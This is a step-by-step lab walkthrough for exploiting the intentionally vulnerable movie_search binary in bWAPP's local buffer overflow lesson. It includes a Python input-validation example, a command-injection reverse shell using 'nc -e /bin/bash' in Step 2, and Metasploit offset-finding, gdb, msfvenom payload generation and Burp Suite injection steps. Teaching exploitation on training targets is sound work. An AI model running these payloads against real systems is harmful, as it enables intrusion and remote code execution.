Buffer Overflow (Local) - Low Security Level
Solution:
Step 1. Enter a movie title that is part of the current bWAPP database and check the output.
(e.g. Hulk, Iron Man)
Then enter a movie title that is not part of the database and check the output.
(e.g. Time)
Check the source code of the lesson (follow the steps as shown in the video).
Open the bof_1.php document.
From the source code we understand that the title is passed straight to the movie_search application as a command-line argument, without any validation in between.
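The missing piece at the low level is a check between the request parameter and the command line. The following is an added example (not bWAPP's own code, and written in Python rather than PHP for illustration) of the kind of validation the page could apply to the title before it is ever handed to the binary; the length limit and the allowed character set are assumptions.

```python
import re
from urllib.parse import unquote

# Assumed limits: a movie title needs nothing beyond letters, digits, spaces
# and a little punctuation, and no legitimate title is hundreds of bytes long.
MAX_TITLE_BYTES = 64
ALLOWED_TITLE = re.compile(r"[A-Za-z0-9 .,:'!&-]+")


def validate_title(raw: str):
    """Return (ok, reason) for a title value as received from the request.

    The value is percent-decoded first, so an encoded payload is judged on
    what the shell and the binary would actually see, not on its encoded form.
    The size check runs before the character check so that an oversized
    input is reported as such even when every character is harmless.
    """
    title = unquote(raw)
    if not title.strip():
        return False, "empty"
    if len(title.encode("utf-8")) > MAX_TITLE_BYTES:
        return False, "too long"
    if not ALLOWED_TITLE.fullmatch(title):
        return False, "disallowed character"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs: two ordinary titles, a shell-metacharacter
    # string, its percent-encoded form, and an oversized cyclic pattern.
    for sample in ("Iron Man", "Hulk", "$(id)", "%24%28id%29", "A" * 360):
        print(repr(sample[:24]), validate_title(sample))
```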
Step 2. The easy way to get a shell: use the command below, as shown in the video.
$(nc -e /bin/bash 10.0.2.4 4444) *Change the IP address to your BeeBox IP
Check the output.
Step 3. The hard way to get a shell
Check the hint given on the lesson page.
First, let us crash the application by feeding it a string generated with Metasploit's pattern_create.rb.
a. At the command prompt run: locate pattern_create.rb
Output: the path to the script, e.g.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
b. Go to the folder where pattern_create.rb is located.
Use the commands
cd /usr/share/metasploit-framework/tools/exploit/
ls -l
You can see pattern_create.rb listed here.
Now execute pattern_create.rb:
Commands: sudo ./pattern_create.rb (*give your password if asked)
sudo ./pattern_create.rb -h
sudo ./pattern_create.rb -l 360
The last command prints a 360-character cyclic pattern.
Save that output on the BeeBox machine.
Step 4. Go to BeeBox.
Open a command prompt and change to the folder /var/www/html/bWAPP/apps
Use the command below:
gdb --args ./movie_search "the pattern output you saved" (please refer to the video).
Note: I have already saved the command on BeeBox and am using it directly.
Use the commands below inside gdb on BeeBox:
run
info registers
Note that the eip register value has been overwritten.
Step 5. On your local machine
Run the command below:
./pattern_offset.rb -q 0x41386c41
Check the output - [*] Exact match at offset 354
On BeeBox, inside gdb, run:
x/100cb $esp
Check the output - l 9 A m ...
On your local machine run:
./pattern_offset.rb -q l9Am
Check the output - [*] Exact match at offset 358
On BeeBox open a new command prompt in /var/www/bWAPP/apps and run:
objdump -D ./movie_search | grep jmp.*esp
Step 6. On your local machine generate the payload with the command below:
sudo msfvenom -p linux/x86/exec CMD=/bin/ps -b '\x00' -e x86/opt_sub -f raw > /home/kali/Desktop/bofpayload.txt
Note: in the original YouTube description the > redirect was written as ) because angle brackets are not allowed there; the command above uses the intended > character.
Give your password (*if asked) and wait patiently until the payload is generated.
Open a new command prompt, go to the location where the file was saved and check the generated payload with: cat bofpayload.txt
Re-encode the payload with the command below:
(echo -n \'; cat /home/kali/Desktop/bofpayload.txt; echo -n \';) | perl -pe 's/(.)/sprintf("%%%02X",ord($1))/seg'
Step 7. Go to the lesson page and check the HINT.
Use the hint to build the exploit.
Follow the steps as shown in the video.
Step 8. Start Burp Suite.
Turn on the proxy.
Go to the lesson page, enter any input of your choice in the search box and click the Search button.
In Burp Suite replace the submitted input with the exploit.
Forward the request.
Go back to the lesson page and check the output.
Explore the lesson further to get a reverse shell (not covered in this video).
PseudoTime